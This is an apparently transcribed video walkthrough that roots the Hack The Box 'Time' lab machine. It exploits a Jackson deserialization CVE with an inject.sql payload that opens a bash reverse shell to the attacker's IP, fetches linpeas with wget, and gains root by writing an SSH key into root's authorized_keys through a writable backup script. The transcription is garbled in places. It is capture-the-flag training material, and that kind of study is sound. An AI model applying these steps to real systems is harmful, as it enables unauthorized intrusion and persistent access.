Hello all, welcome to Global Offensive Hacker Associate community and welcome to another hacking episode of Hacker Associate. In this video, we are going to see how we can root a time machine which is right now listed under the active machine, and I will release the video when this machine will expire. So first you need to start the machine, and the IP address of this machine is 10.10.10.214. Okay, this is IP address, and I am Harshad, founder and CEO of Hacker Associate. Let's begin. So when you go here, okay, like first we ping the machine and you can see reply is coming. After that, you can just need to run here nmap command and then check how many ports are open there. In my case, if I want to show you, so let me go to my Sublime editor and here is my HTB. So if you go to the HTB, here we have a time machine and here is a port. Okay, let me open using Google Chrome for you. So here I have converted that file into HTML and here you go. So in this machine, if you can check, there are two port open. One is 22, it means we can do SSH, and second one we have a 80 port number, you can see, right, Apache. And here if you see the title showing here online JSON parser, it means I think we need to deal with the JSON maybe. So what I can do in this case, I can simple go here and I can just type 10.10.10.214. okay, that's how we need to check because port 80 is open there. So if you can check here, there's a like button beautify that understands the functionality of the application. You just simply just type Harshad here and then process. So let's see what output will come, and here it is coming called null. Okay, kind of maybe it look like serialization and deserialization kind of thing. So let me go here, validate beta. After that, you can simply just type again, type Harsh, and in string you can just type, or test you can try. So example, let's say if you process again, let's check what exactly you are getting. So here see we are getting an error. Okay, and our first rule is what? Error should not come on the web page, right? This is our first case. So simple copy it and let me go to the Sublime and then try to figure it out what exactly it is. So it is telling validated failed unhandled Java exception and .com faster XML Jackson .core and then JSON parse exception. Okay, and then calls unrecognized token Harsh was expecting and true and false. It look like a serialization and deserialization kind of thing because here is a true, false, null. These values are there. And what I can do here is it talking about JSON. So let me go here and validate here. What I can do, I can just try in JSON format. Example, let's say name. Okay, and then after that I'll just try name Harshad. Okay, like that. I'm simple trying. Okay, because penetration testing nothing but the trying only, hidden trial method. So process it and let's see what exactly we are getting after giving a proper input. We are getting a same result. Okay, it means not accepting JSON. Okay, it means the same result is coming. Okay, if you put a normal string as well as JSON also. So now what we can figure out here is, I think we can check here. Okay, this is string. Okay, using a Google. So copy that part. Okay, and then if we're not getting any other thing, then we'll copy the entire string and then you can check on the Google. So you can simple go to the Google and you can simple search this thing. Okay, exploit GitHub. You can simple search on this. And here we go, right? Here you can see we have a JSON 502 CVE. That part you need to open and we can understand the exploit first before launching the attack. So now I'm going to this JSON, okay, like JS502N, and if you can check, this is CVE, and if you read the information, we have like inject.sql. So that payload we need to create. It means we need to create a file called inject.sql like this. Okay, and you can copy paste this complete payload and you can add your payload here. Instead of this exploited.txt, you can put your payload here. So in my case, I have already done this thing and I will show you exactly the same thing here. So let me go here, drag and drop my Sublime, and I have STB and I have a time. You can see this is called inject.sql. Okay, and I use my payload call as in bash -i. 10.10.14.05 is my IP address. Okay, and this is like I'm using my payload. All remain same. That part. Okay, that part we need to create. After that, what we need to do here is you can check here. There is a string is available there. This one. If you read all the code from top to bottom, and I got this interesting one here. So let me open with double quote. Everything I'll copy from this section to this section. So copy that part, okay, and you can copy properly and add double quote in it. And after that, you can simply go to the file and you can simply paste it, okay. And we need to put a bracket here because it's closing with the bracket. We need to close with the bracket and we need to open with the bracket, right? After that, you can see you need to put, okay, your IP address here 10.10.14.5. So and I will share, okay, this file, okay, to here, okay, to this particular web server 10.10.10.214. So let me show you how we can do that. You need to remove, okay, all this, okay, slashes, okay, backslash, that part, okay, you can remove it, okay, from each and every section. I have already done this thing also. You can see I have a file called injecting in web validate. So that part you need to trigger it out properly, and you can see this is my IP address. It's called 10.10.14.580, and I'm going to give, okay, that file, okay, to the server. How we can give? Simple, you can copy that code. This machine is very easy, by the way. You can copy that code and we need to inject it here, okay. So we need to select, okay, this validate beta, and after that, okay, we need to inject this code here, and we have a file called 10.10.14.580, okay. Before hitting this button, let me first set, okay, like my listener. So I am listening on port number 5555, okay. So what I can do here, I can go to the terminal and I go to the Sublime, and after that I have a STB, and after that I have a time, okay, and if you just ls. So we need to send, okay, this file, okay. So what I can do, I can use python 3 minus m http dot server port 80 we want to run, and then enter. So you can see 80 is started. We need to allow it, and then we need to I'll split, okay, this part, okay, horizontally. After that, okay, we need to start NC listening on port number 5555, okay. Press enter, and now we'll going to process it. So now you can see this is the code I have injected, and after that I'm going to click here process, and let's see what will happen, okay, in this case. So I think we'll get the shell shortly. Okay, fantastic, we got the shell, okay. This is the thing, and now this part is done. We don't require this one. Control C, we'll exit from this section. So we are here right now. We'll use, okay, export equal to term equal to x term. So we can now use clear command, okay, here, that part. After that, okay, you can simply just type find, okay, inside this, okay, what file you require, user.txt, right? We can put, okay, star.txt. So here, okay, if we can check, there are many file, okay. So it might be available, okay, under home directory. So let me go to the cd/home, then ls, we have a cd, we have pericles, and ls, and here we have user.txt, okay. So that part, okay, we have identified. So cat user.txt, enter, okay. This is a txt. Now here what I need to do here is I need to perform a privilege escalation. So when you check the ID here, okay, it is, okay, you can see the user is available there, right? So how we can perform a privilege escalation in this case? So what I can do here is I can simply go to the temp directory. So here's a temp directory, and let me clear the screen, okay. And I'm going to, okay, like put my linpiece application, maybe linpiece, okay, like bash, I will going to transfer it here. So let me go here vertically, and let me go to my OPT directory where my linpiece is available there. CD Linux privilege escalation, CD privilege, and here I have this call as a linpiece, okay. So CD, okay, go to there, and we need to transfer that file. So you can use python 3 minus m, you can use http dot server port 80. So it is working on 80, and now we transfer this thing, right? So we can use a wget http 10.10.14.5, and we have a file called as an is called linpeas.sh. If everything okay, we'll be able to download that file, and fantastic, we have downloaded the file. Okay, and this part is done. We need to exit from here, and now you can simple ls and you can check this is a file. Okay, how to run it? You can use bash and you can run pas.sh, press enter. So fantastic, we have started okay our script here okay for privilege escalation, and let's see okay how we can escalate the privilege. So it will take a little bit time, okay, just wait for it, and when this part is done, okay, we'll see the other section. So that's all called penetration testing, right? Trying. And I am okay like providing many courses okay under Hacker Associate, so you can go to the hackerassociate.com and please check the application. And I am focusing on next generation technology like firewall bypassing, security operation centers, iOS penetration testing, Android penetration testing, cloud penetration testing, and many more. So just wait for it. Okay, I think we have a lot of informations. So I'm checking. Okay, like let me go to the top section. Okay, like any other information we are getting or not. So go to the top. Okay, here look back. We have 53. We don't have much interesting information here. This is a root, and I think so. Yes, we got something here. You can see you on the script, and there is a script called userbin timer backup.sh. So let's copy that part and understand what exactly it is there. Okay. So in this case, okay, like we can write something. You can see it is called sh files in the path, and you on the script. This is the meaning. It's writable by the way. So simple. You can go here and you can try like this. CD. You can simple v, and then after that you can go inside this directory and ls. Sorry, here I need to type ls minus la. Okay, and I need to search for the file timer underscore backup dot sh. So when you check okay this file okay like ls minus la grep timer backup dot sh, you can see it is okay like here okay we have permissions. You can see rwx rw minus rw. So root okay on by the root, and then the writable okay by the user. So now what we can do in this case, there are two ways again okay in order to escalate the privilege. The first method is okay you can put a payload here. Okay, second method okay you can use okay your key SSH key there. Okay, so let me show you how we can do that. So simple, you can go to this section okay, and let me go to the rough section where I am working on this. So control A and then remove the things from here. So you need to type okay like that echo, and after that okay you can use echo, and you need to use SSH key. You need to use it here, and after that you can simple append this thing okay under the root section okay under this directory, and authorized underscore keys okay you can paste it here. After that, if this part is done okay, and then say entire thing okay you need to put okay under the user bin okay, and after that okay you need to use okay like the timer underscore backup dot sh. Okay, so in my case again I'm repeating is called echo, and then key name okay we need to put it here okay our public key, and this is the directory okay we need to paste okay, and after that okay the same we are going to redirect okay to this file. What happens, so we can directly log in okay to the system. Root part is super easy in this case in this machine. So what I can do in this section, I can show you okay was split horizontally, and here if you can go here ls command, and let me go to the Sublime, and before this I'll need to go to the desktop because this is my location where I am working. Desktop, Sublime, stb, then we have a time, and if you can check in my case I have used okay root privilege payload, and this is exactly I am using here, you can see clearly. Okay, so this is the thing. So we have echo, and what I can do here I'll show you by the way. So simple, you can go to cd, we have a root cd slash root We can use, sorry, in my case is a Mac system, user harshad.ssh. Okay, and in this case, okay, like I have a public key available there, cd id rsa. So we need to use cat id rsa. This is my private key and I need to use id rsa.pub. That part you need to copy. So you can copy that part, okay, from here. So from here to here. Let me copy that part, copy this section, okay, properly. Now you need to exit from this section. And here we'll rearrange it right now. So we can go here and we can simply put a key here. The SSH key. After that, okay, you can see it is going to append, okay, to here. Root, okay, and the same thing is going to your timer underscore backup.sh. So now you can simple copy the entire thing, okay, from here, this copy it, and you can simple go here and you can paste. If everything okay, you will be able to log in. So how we can log in right now? So I'll go here vertically and I'm going to log in, okay, using SSH, my private key, which is located under, okay, like this directory, user, okay, and SSH ID RSA. We need to root the things now. So we have a 10.10.10.214. Okay, if everything okay, we'll be able to log into the system. So I'm just I think is a error. So I need to use 10.10 and I use 110 something. So let me just correct it and try to log in using our private key. And fantastic, we now logged in. Okay, now you can simply go to the cat/root/root.txt. We got the root flag. I hope this video is informative for you. Thank you for watching the video. Have a great day ahead. See you soon in the next episode.